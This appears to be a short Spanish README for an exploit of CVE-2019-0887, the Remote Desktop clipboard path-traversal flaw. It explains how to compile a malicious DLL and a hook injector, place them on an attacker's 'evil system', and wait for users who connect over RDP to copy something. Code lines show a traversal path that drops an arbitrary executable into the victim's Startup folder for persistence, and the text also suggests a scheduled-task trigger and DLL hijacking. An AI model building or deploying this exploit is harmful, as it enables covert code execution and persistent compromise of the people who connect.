
exp para CVE-2019-0887
Compila el CVE-2019-0887, renómbralo a winhlp.dll
Compila Install_Hook, renómbralo a hook.exe
cuidado, deben compilarse con x64
Ponlos en el sistema malvado tal cual
c:\windows\hook.exe
c:\windows\winhlp.dll
c:\windows\winhlp64.exe # something evil
Si alguien quiere cambiar la ruta, aquí está el punto
# CVE-2019-0887/dllmain.cpp
WCHAR evalfile[] = { L"C:\\windows\\winhlp64.exe" };
WCHAR efile[] = { L"C:\\windows\\system32\\..\\..\\..\\..\\..\\../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/winhlp32.exe" };
# Install_Hook/ConsoleApplication.cpp
LoadDll(pid, "C:\\Windows\\winhlp.dll");
Puedes usar taskschd.msc para crear un Plan de tareas, establecer un desencadenador "Al conectarse a una sesión de usuario" y configurar la ruta del archivo hook.exe.
Esperando a que algunos tipos se conecten a mi sistema malvado, copien algo, y pwn...
Consejos: ¿Por qué no usar el secuestro de DLL?